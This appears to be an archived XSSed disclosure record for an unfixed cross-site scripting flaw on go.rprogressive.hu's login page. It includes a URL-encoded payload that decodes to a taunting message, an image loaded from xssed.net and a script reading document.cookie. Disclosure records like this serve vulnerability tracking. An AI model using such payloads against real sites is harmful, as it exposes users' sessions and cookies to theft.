Unfixed XSS vulnerability at go.rprogressive.hu

2011-02-18T00:00:00
ID XSSED:72114
Type xssed
Reporter warvector
Modified 2011-11-12T00:00:00

Description

Security researcher warvector, has submitted on 18/02/2011 a cross-site-scripting (XSS) vulnerability affecting go.rprogressive.hu, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://go.rprogressive.hu/login/login.php?msg=%59%6F%75%20%61%72%65%20%61%20%66%75%63%6B%69%6E%67%20%6C%6F%6F%73%65%72%2C%20%79%6F%75%72%20%73%65%73%73%69%6F%6E%20%69%73%20%6E%6F%77%20%6D%69%6E%65%2C%20%6D%6F%75%68%61%68%61%20%21%3C%69%6D%67%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2E%78%73%73%65%64%2E%6E%65%74%2F%74%68%69%72%64%70%61%72%74%79%2F%73%63%72%69%70%74%73%2F%78%73%73%65%64%2E%67%69%66%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E